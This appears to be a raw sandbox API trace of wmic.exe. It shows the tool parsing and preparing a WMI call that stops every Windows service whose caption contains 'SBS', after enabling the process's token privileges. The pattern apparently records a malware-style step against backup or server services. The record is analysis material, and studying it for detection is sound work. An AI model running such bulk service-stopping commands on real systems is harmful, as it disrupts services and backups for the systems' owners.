[0112.695] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='SERVICE") returned 0x23 [0112.695] SysStringLen (param_1="'") returned 0x1 [0112.696] IWbemServices:GetObject (in: This=0x5c0828, strObjectPath="MSFT_CliAlias.FriendlyName='SERVICE'", lFlags=0, pCtx=0x0, ppObject=0x36f708*=0x0, ppCallResult=0x0 | out: ppObject=0x36f708*=0x5e51e8, ppCallResult=0x0) returned 0x0 [0112.702] IWbemClassObject:Get (in: This=0x5e51e8, wszName="Target", lFlags=0, pVal=0x36f6e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x36f6e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Select * from Win32_Service", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0112.702] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0112.702] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0112.703] IWbemClassObject:Get (in: This=0x5e51e8, wszName="PWhere", lFlags=0, pVal=0x36f6e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x36f6e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="WHERE Name='#'", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0112.703] lstrlenW (lpString="WHERE Name='#'") returned 14 [0112.703] lstrlenW (lpString="WHERE Name='#'") returned 14 [0112.703] IWbemClassObject:Get (in: This=0x5e51e8, wszName="Connection", lFlags=0, pVal=0x36f6e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x36f6e0*(varType=0xd, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x5e55a8, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0112.703] IUnknown:QueryInterface (in: This=0x5e55a8, riid=0x13069ac*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36f6fc | out: ppvObject=0x36f6fc*=0x5e55a8) returned 0x0 [0112.703] GetCurrentThreadId () returned 0xe8c [0112.703] ??0CHString@@QAE@XZ () returned 0x36f67c [0112.703] IWbemClassObject:Get (in: This=0x5e55a8, wszName="Namespace", lFlags=0, pVal=0x36f660*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x36f660*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\CIMV2", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0112.703] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0112.703] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0112.703] IWbemClassObject:Get (in: This=0x5e55a8, wszName="Locale", lFlags=0, pVal=0x36f660*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x5c743c, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x36f660*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ms_409", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0112.703] lstrlenW (lpString="ms_409") returned 6 [0112.703] lstrlenW (lpString="ms_409") returned 6 [0112.703] IWbemClassObject:Get (in: This=0x5e55a8, wszName="User", lFlags=0, pVal=0x36f660*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x5c743c, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x36f660*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0112.703] IWbemClassObject:Get (in: This=0x5e55a8, wszName="Password", lFlags=0, pVal=0x36f660*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x36f660*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0112.703] IWbemClassObject:Get (in: This=0x5e55a8, wszName="Server", lFlags=0, pVal=0x36f660*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x36f660*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=".", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0112.703] lstrlenW (lpString=".") returned 1 [0112.704] lstrlenW (lpString=".") returned 1 [0112.704] IWbemClassObject:Get (in: This=0x5e55a8, wszName="Authority", lFlags=0, pVal=0x36f660*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x5c743c, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x36f660*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0112.704] ??1CHString@@QAE@XZ () returned 0x74a66430 [0112.704] IUnknown:Release (This=0x5e55a8) returned 0x1 [0112.704] GetCurrentThreadId () returned 0xe8c [0112.704] ??0CHString@@QAE@XZ () returned 0x36f66c [0112.704] IWbemClassObject:Get (in: This=0x5e51e8, wszName="__RELPATH", lFlags=0, pVal=0x36f654*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x36f654*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MSFT_CliAlias.FriendlyName=\"Service\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0112.704] GetCurrentThreadId () returned 0xe8c [0112.704] ??0CHString@@QAE@XZ () returned 0x36f5e8 [0112.704] ??0CHString@@QAE@PBG@Z () returned 0x36f5e4 [0112.704] ??0CHString@@QAE@ABV0@@Z () returned 0x36f564 [0112.704] ?Empty@CHString@@QAEXXZ () returned 0x74a66430 [0112.704] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x7c89e8 [0112.704] ?Find@CHString@@QBEHPBG@Z () returned 0x1b [0112.704] ?Left@CHString@@QBE?AV1@H@Z () returned 0x36f55c [0112.704] ??H@YG?AVCHString@@ABV0@PBG@Z () returned 0x36f560 [0112.704] ??YCHString@@QAEABV0@ABV0@@Z () returned 0x36f5e4 [0112.704] ??1CHString@@QAE@XZ () returned 0x1 [0112.704] ??1CHString@@QAE@XZ () returned 0x1 [0112.704] ?Mid@CHString@@QBE?AV1@H@Z () returned 0x36f558 [0112.704] ??4CHString@@QAEABV0@ABV0@@Z () returned 0x36f564 [0112.704] ??1CHString@@QAE@XZ () returned 0x1 [0112.704] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x7c8a48 [0112.704] ?Find@CHString@@QBEHPBG@Z () returned 0x7 [0112.704] ?Left@CHString@@QBE?AV1@H@Z () returned 0x36f55c [0112.704] ??H@YG?AVCHString@@ABV0@PBG@Z () returned 0x36f560 [0112.704] ??YCHString@@QAEABV0@ABV0@@Z () returned 0x36f5e4 [0112.704] ??1CHString@@QAE@XZ () returned 0x1 [0112.704] ??1CHString@@QAE@XZ () returned 0x1 [0112.704] ?Mid@CHString@@QBE?AV1@H@Z () returned 0x36f558 [0112.704] ??4CHString@@QAEABV0@ABV0@@Z () returned 0x36f564 [0112.704] ??1CHString@@QAE@XZ () returned 0x74a66430 [0112.704] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x74a66424 [0112.704] ??1CHString@@QAE@XZ () returned 0x74a66430 [0112.705] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c [0112.705] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17 [0112.705] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53 [0112.705] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"Service\\\"") returned 0x26 [0112.705] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"Service\\\"") returned 0x79 [0112.705] SysStringLen (param_1="\"") returned 0x1 [0112.705] IWbemServices:GetObject (in: This=0x5c0648, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"Service\\\"\"", lFlags=0, pCtx=0x0, ppObject=0x36f5f4*=0x0, ppCallResult=0x0 | out: ppObject=0x36f5f4*=0x5e5988, ppCallResult=0x0) returned 0x0 [0112.706] IWbemClassObject:Get (in: This=0x5e5988, wszName="Text", lFlags=0, pVal=0x36f5c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x36f5c0*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x5cf3e0*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0x5c7ba0, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0112.706] SafeArrayGetLBound (in: psa=0x5cf3e0, nDim=0x1, plLbound=0x36f5d0 | out: plLbound=0x36f5d0) returned 0x0 [0112.706] SafeArrayGetUBound (in: psa=0x5cf3e0, nDim=0x1, plUbound=0x36f5d4 | out: plUbound=0x36f5d4) returned 0x0 [0112.706] SafeArrayGetElement (in: psa=0x5cf3e0, rgIndices=0x36f5ec, pv=0x36f5d8 | out: pv=0x36f5d8) returned 0x0 [0112.707] SysStringLen (param_1="Service application management. ") returned 0x20 [0112.707] IUnknown:Release (This=0x5e5988) returned 0x0 [0112.707] ??1CHString@@QAE@XZ () returned 0x1 [0112.707] ??1CHString@@QAE@XZ () returned 0x74a66430 [0112.707] ??1CHString@@QAE@XZ () returned 0x74a66430 [0112.707] lstrlenW (lpString="Service application management. ") returned 32 [0112.707] lstrlenW (lpString="Service application management. ") returned 32 [0112.707] IUnknown:Release (This=0x5e51e8) returned 0x0 [0112.707] ??1CHString@@QAE@XZ () returned 0x74a66430 [0112.707] lstrlenW (lpString="PATH") returned 4 [0112.707] lstrlenW (lpString="WHERE") returned 5 [0112.707] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="WHERE", cchCount1=5, lpString2="PATH", cchCount2=4) returned 3 [0112.707] lstrlenW (lpString="WHERE") returned 5 [0112.708] lstrlenW (lpString="WHERE") returned 5 [0112.708] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="WHERE", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0112.708] lstrlenW (lpString="/") returned 1 [0112.708] lstrlenW (lpString="caption LIKE '%SBS%'") returned 20 [0112.708] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="caption LIKE '%SBS%'", cchCount1=20, lpString2="/", cchCount2=1) returned 3 [0112.708] lstrlenW (lpString="-") returned 1 [0112.708] lstrlenW (lpString="caption LIKE '%SBS%'") returned 20 [0112.708] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="caption LIKE '%SBS%'", cchCount1=20, lpString2="-", cchCount2=1) returned 3 [0112.708] lstrlenW (lpString="caption LIKE '%SBS%'") returned 20 [0112.708] lstrlenW (lpString="caption LIKE '%SBS%'") returned 20 [0112.708] lstrlenW (lpString="/") returned 1 [0112.708] lstrlenW (lpString="CALL") returned 4 [0112.708] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0112.708] lstrlenW (lpString="-") returned 1 [0112.708] lstrlenW (lpString="CALL") returned 4 [0112.708] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0112.708] lstrlenW (lpString="CALL") returned 4 [0112.708] lstrlenW (lpString="CALL") returned 4 [0112.708] lstrlenW (lpString="GET") returned 3 [0112.708] lstrlenW (lpString="CALL") returned 4 [0112.708] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0112.708] lstrlenW (lpString="LIST") returned 4 [0112.708] lstrlenW (lpString="CALL") returned 4 [0112.708] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0112.708] lstrlenW (lpString="SET") returned 3 [0112.708] lstrlenW (lpString="CALL") returned 4 [0112.708] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0112.708] lstrlenW (lpString="CREATE") returned 6 [0112.708] lstrlenW (lpString="CALL") returned 4 [0112.708] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0112.708] lstrlenW (lpString="CALL") returned 4 [0112.708] lstrlenW (lpString="CALL") returned 4 [0112.708] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0112.708] lstrlenW (lpString="/") returned 1 [0112.708] lstrlenW (lpString="STOPSERVICE") returned 11 [0112.708] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="STOPSERVICE", cchCount1=11, lpString2="/", cchCount2=1) returned 3 [0112.708] lstrlenW (lpString="-") returned 1 [0112.708] lstrlenW (lpString="STOPSERVICE") returned 11 [0112.708] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="STOPSERVICE", cchCount1=11, lpString2="-", cchCount2=1) returned 3 [0112.708] lstrlenW (lpString="STOPSERVICE") returned 11 [0112.708] lstrlenW (lpString="STOPSERVICE") returned 11 [0112.708] GetCurrentThreadId () returned 0xe8c [0112.708] ??0CHString@@QAE@XZ () returned 0x36ee74 [0112.709] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0112.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1301478, cbMultiByte=-1, lpWideCharStr=0x7c8a70, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0112.709] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0112.709] SysStringLen (param_1="SERVICE") returned 0x7 [0112.709] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='SERVICE") returned 0x23 [0112.709] SysStringLen (param_1="'") returned 0x1 [0112.709] IWbemServices:GetObject (in: This=0x5c0828, strObjectPath="MSFT_CliAlias.FriendlyName='SERVICE'", lFlags=0, pCtx=0x0, ppObject=0x36ee50*=0x0, ppCallResult=0x0 | out: ppObject=0x36ee50*=0x5e51e8, ppCallResult=0x0) returned 0x0 [0112.715] lstrlenW (lpString="CALL") returned 4 [0112.715] lstrlenW (lpString="CALL") returned 4 [0112.715] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0112.715] IWbemClassObject:Get (in: This=0x5e51e8, wszName="Verbs", lFlags=0, pVal=0x36ee08*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x36ee08*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x5cf3e0*(cDims=0x1, fFeatures=0x240, cbElements=0x4, cLocks=0x0, pvData=0x5cf460, rgsabound=((cElements=0xa, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0112.716] SafeArrayGetLBound (in: psa=0x5cf3e0, nDim=0x1, plLbound=0x36ee18 | out: plLbound=0x36ee18) returned 0x0 [0112.716] SafeArrayGetUBound (in: psa=0x5cf3e0, nDim=0x1, plUbound=0x36ee20 | out: plUbound=0x36ee20) returned 0x0 [0112.716] SafeArrayGetElement (in: psa=0x5cf3e0, rgIndices=0x36ee28, pv=0x36ee5c | out: pv=0x36ee5c) returned 0x0 [0112.716] IWbemClassObject:Get (in: This=0x5e6bb0, wszName="Name", lFlags=0, pVal=0x36edf8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x36edf8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StartService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0112.716] lstrlenW (lpString="StartService") returned 12 [0112.716] lstrlenW (lpString="STOPSERVICE") returned 11 [0112.716] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="STOPSERVICE", cchCount1=11, lpString2="StartService", cchCount2=12) returned 3 [0112.716] IUnknown:Release (This=0x5e6bb0) returned 0x1 [0112.716] SafeArrayGetElement (in: psa=0x5cf3e0, rgIndices=0x36ee28, pv=0x36ee5c | out: pv=0x36ee5c) returned 0x0 [0112.716] IWbemClassObject:Get (in: This=0x5e70e0, wszName="Name", lFlags=0, pVal=0x36edf8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StartService", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x36edf8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StopService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0112.716] lstrlenW (lpString="StopService") returned 11 [0112.716] lstrlenW (lpString="STOPSERVICE") returned 11 [0112.716] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="STOPSERVICE", cchCount1=11, lpString2="StopService", cchCount2=11) returned 2 [0112.716] GetCurrentThreadId () returned 0xe8c [0112.716] ??0CHString@@QAE@XZ () returned 0x36ec74 [0112.716] IWbemClassObject:Get (in: This=0x5e70e0, wszName="Description", lFlags=0, pVal=0x36ec44*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x36ec44*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The StopService method places the service in the stopped state. It returns an integer value of 0 if the service was successfully stopped, 1 if the request is not supported, and any other number to indicate an error.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0112.716] ??1CHString@@QAE@XZ () returned 0x74a66430 [0112.716] IWbemClassObject:Get (in: This=0x5e70e0, wszName="Parameters", lFlags=0, pVal=0x36ede8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x36ede8*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0112.717] IWbemClassObject:Get (in: This=0x5e70e0, wszName="VerbType", lFlags=0, pVal=0x36ed80*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x36ed80*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0112.717] IWbemClassObject:Get (in: This=0x5e70e0, wszName="Derivation", lFlags=0, pVal=0x36ed68*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x36ed68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StopService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0112.717] lstrlenW (lpString="StopService") returned 11 [0112.717] lstrlenW (lpString="StopService") returned 11 [0112.717] IUnknown:Release (This=0x5e70e0) returned 0x1 [0112.717] IUnknown:Release (This=0x5e51e8) returned 0x0 [0112.718] ??1CHString@@QAE@XZ () returned 0x74a66430 [0112.718] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0112.718] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0112.718] wcstok (in: _String="Select * from Win32_Service", _Delimiter=" ", _Context=0xab880713 | out: _String="Select", _Context=0xab880713) returned="Select" [0112.718] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xab880713 | out: _String=0x0, _Context=0xab880713) returned="*" [0112.718] lstrlenW (lpString="FROM") returned 4 [0112.718] lstrlenW (lpString="*") returned 1 [0112.718] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0112.718] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xab880713 | out: _String=0x0, _Context=0xab880713) returned="from" [0112.718] lstrlenW (lpString="FROM") returned 4 [0112.718] lstrlenW (lpString="from") returned 4 [0112.718] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0112.718] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xab880713 | out: _String=0x0, _Context=0xab880713) returned="Win32_Service" [0112.718] lstrlenW (lpString="SET") returned 3 [0112.718] lstrlenW (lpString="CALL") returned 4 [0112.718] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0112.718] lstrlenW (lpString="CREATE") returned 6 [0112.718] lstrlenW (lpString="CALL") returned 4 [0112.718] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0112.718] lstrlenW (lpString="GET") returned 3 [0112.719] lstrlenW (lpString="CALL") returned 4 [0112.719] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0112.719] lstrlenW (lpString="LIST") returned 4 [0112.719] lstrlenW (lpString="CALL") returned 4 [0112.719] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0112.719] lstrlenW (lpString="ASSOC") returned 5 [0112.719] lstrlenW (lpString="CALL") returned 4 [0112.719] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="ASSOC", cchCount2=5) returned 3 [0112.719] WbemLocator:IUnknown:AddRef (This=0x598048) returned 0x3 [0112.719] lstrlenW (lpString="") returned 0 [0112.719] lstrlenW (lpString="LHNIWSJ") returned 7 [0112.719] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="", cchCount2=0) returned 3 [0112.719] lstrlenW (lpString="LHNIWSJ") returned 7 [0112.719] lstrlenW (lpString="LHNIWSJ") returned 7 [0112.719] GetCurrentThreadId () returned 0xe8c [0112.719] GetCurrentProcess () returned 0xffffffff [0112.719] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x36f778 | out: TokenHandle=0x36f778*=0x270) returned 1 [0112.719] GetTokenInformation (in: TokenHandle=0x270, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x36f774 | out: TokenInformation=0x0, ReturnLength=0x36f774) returned 0 [0112.719] GetTokenInformation (in: TokenHandle=0x270, TokenInformationClass=0x3, TokenInformation=0x7c8ba0, TokenInformationLength=0x118, ReturnLength=0x36f774 | out: TokenInformation=0x7c8ba0, ReturnLength=0x36f774) returned 1 [0112.719] AdjustTokenPrivileges (in: TokenHandle=0x270, DisableAllPrivileges=0, NewState=0x7c8ba0*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0112.719] CloseHandle (hObject=0x270) returned 1 [0112.719] lstrlenW (lpString="GET") returned 3 [0112.719] lstrlenW (lpString="CALL") returned 4 [0112.719] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0112.719] lstrlenW (lpString="LIST") returned 4 [0112.719] lstrlenW (lpString="CALL") returned 4 [0112.719] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0112.719] lstrlenW (lpString="SET") returned 3 [0112.719] lstrlenW (lpString="CALL") returned 4 [0112.719] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0112.719] lstrlenW (lpString="CALL") returned 4 [0112.719] lstrlenW (lpString="CALL") returned 4 [0112.719] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0112.719] ??0CHString@@QAE@XZ () returned 0x36f738 [0112.719] GetCurrentThreadId () returned 0xe8c [0112.719] SysStringLen (param_1="\\\\") returned 0x2 [0112.719] SysStringLen (param_1="LHNIWSJ") returned 0x7 [0112.720] SysStringLen (param_1="\\\\LHNIWSJ") returned 0x9 [0112.720] SysStringLen (param_1="\\") returned 0x1 [0112.720] SysStringLen (param_1="\\\\LHNIWSJ\\") returned 0xa [0112.720] SysStringLen (param_1="ROOT\\CIMV2") returned 0xa [0112.720] WbemLocator:IWbemLocator:ConnectServer (in: This=0x598048, strNetworkResource="\\\\LHNIWSJ\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1349564 | out: ppNamespace=0x1349564*=0x5c05f8) returned 0x0 [0112.727] CoSetProxyBlanket (pProxy=0x5c05f8, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0112.727] ??1CHString@@QAE@XZ () returned 0x74a66430 [0112.727] ??0CHString@@QAE@XZ () returned 0x36f734 [0112.727] GetCurrentThreadId () returned 0xe8c [0112.727] lstrlenA (lpString="") returned 0 [0112.727] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1302b44, cbMultiByte=-1, lpWideCharStr=0x7c8b20, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0112.727] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0112.727] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0112.727] wcstok (in: _String="Select * from Win32_Service", _Delimiter=" ", _Context=0xab880677 | out: _String="Select", _Context=0xab880677) returned="Select" [0112.728] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xab880677 | out: _String=0x0, _Context=0xab880677) returned="*" [0112.728] lstrlenW (lpString="FROM") returned 4 [0112.728] lstrlenW (lpString="*") returned 1 [0112.728] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0112.728] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xab880677 | out: _String=0x0, _Context=0xab880677) returned="from" [0112.728] lstrlenW (lpString="FROM") returned 4 